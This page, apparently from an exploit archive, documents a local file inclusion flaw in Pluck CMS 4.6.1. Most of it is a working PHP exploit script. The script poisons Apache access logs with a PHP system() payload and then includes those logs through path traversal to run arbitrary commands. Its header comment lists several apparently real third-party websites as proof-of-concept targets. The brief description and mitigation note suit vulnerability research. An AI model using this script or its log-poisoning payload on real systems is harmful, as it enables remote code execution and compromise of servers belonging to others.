header-logo
Suggest Exploit
vendor:
Pluck CMS
by:
Alfons Luja
5.5
CVSS
MEDIUM
Local File Inclusion (LFI)
22
CWE
Product Name: Pluck CMS
Affected Version From: 4.6.2001
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Pluck v 4.6.1 LFI exploit

This exploit targets the Pluck v 4.6.1 CMS and takes advantage of a local file inclusion vulnerability in the 'module_pages_site.php' file. By manipulating the 'post' parameter in the URL, an attacker can include arbitrary files on the server. The exploit provides a proof of concept by including the 'ls' command to list the contents of the '/bin' directory.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Pluck CMS and apply any security patches released by the vendor. Additionally, access controls should be implemented to restrict access to sensitive files and directories.
Source

Exploit-DB raw data:

<?php 

/*
 pluck v 4.6.1 LFI exploit
 autor : Alfons Luja
 Vuln is in \data\modules\blog\module_pages_site.php 

  ...

      $includepage = 'blog_include.php';
      //Only set 'view post'-page if a post has been specified
      if (isset($_GET['post'])) {
	//Check if post exists, and include information
	   if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
		include('data/settings/modules/blog/posts/'.$_GET['post']);
		$module_page['viewpost'] = $post_title;
	   }
      }
 ...

 Nothing to comment ;x
 Greetings: For all friends and obvious for me ;D

 pr00f: 
 http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/  
 

if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]\n");

set_time_limit(0);
error_reporting(0);

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x

$shell = array(  
         "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
         "../apache/logs/access.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/access.log",
         "../../../../../apache/logs/access.log",
         "../../../../../../apache/logs/access.log",
         "../../../../../../../apache/logs/access.log",
         "../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../../apache/logs/access.log",
         "../var/log/httpd/access.log",
         "../../var/log/httpd/access.log",
         "../../../var/log/httpd/access.log",
         "../../../../var/log/httpd/access.log",
         "../../../../../var/log/httpd/access.log",
         "../../../../../../var/log/httpd/access.log",
         "../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../../var/log/httpd/access.log",
         "../var/log/apache/access.log",
         "../../var/log/apache/access.log",
         "../../../var/log/apache/access.log",
         "../../../../var/log/apache/access.log",
         "../../../../../var/log/apache/access.log",
         "../../../../../../var/log/apache/access.log",
         "../../../../../../../var/log/apache/access.log",
         "../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../../var/log/apache/access.log",
         "../usr/local/apache2/logs/access.log",
         "../../usr/local/apache2/logs/access.log",
         "../../../usr/local/apache2/logs/access.log",
         "../../../../usr/local/apache2/logs/access.log",
         "../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../../usr/local/apache2/logs/access.log", 
   );
function _hdr($int){   //Mia³o nie byæ file_get_contents
       
        global $shell,$host,$path;
        $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";
        $header .= "Host: $host\r\n";
        $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Accept-Encoding: gzip,deflate\r\n";
        $header .= "Connection: close\r\n\r\n";
        return $header;


}


function _inject($hosts,$ports){
    
           $hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
           if(!$hnd) die("Injection errr $errstr\n");
           fwrite($hnd,_hdr(0));
           fclose($hnd);  


}

function _result($data){
 
          $ret = explode(' e[Ho_trip ',$data); 
            if($ret[1] != ""){
              for($i = 1;$i<count($ret);$i++){
               $ret_2 = explode(' d34th_trip',$ret[$i]);  
                   if($i - count($ret) == -1){
                     if($ret_2[0] != ""){
                        echo($ret_2[0]);
                     } else {
                        die("Exploit failed!!\n");
                     }
               } 
              }    
               
            }

}

function _exploit($hosts,$paths){

        global $shell;
        $rets = "";
        $count = count($shell);

        for($i=1;$i<$count;$i++){
            
            $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
           _result($tab);
  
        }
 
         
}
echo("---- pluck v 4.6.1 -----\n\n".
     "Autor: Alfons Luja\n".
     "Target: $host\n".
     "Path: $path\n".
     "Port: $port\n".
     "COM: $command\n".
     "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");

    _inject($host,$port);
    _exploit($host,$path);

?>

# milw0rm.com [2009-03-23]

Navigation

Suggest Exploit

Services By CQR